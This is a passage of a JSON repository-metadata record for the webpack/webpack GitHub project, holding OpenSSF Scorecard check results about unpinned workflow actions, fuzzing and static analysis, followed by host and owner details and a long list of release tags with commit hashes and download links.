https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind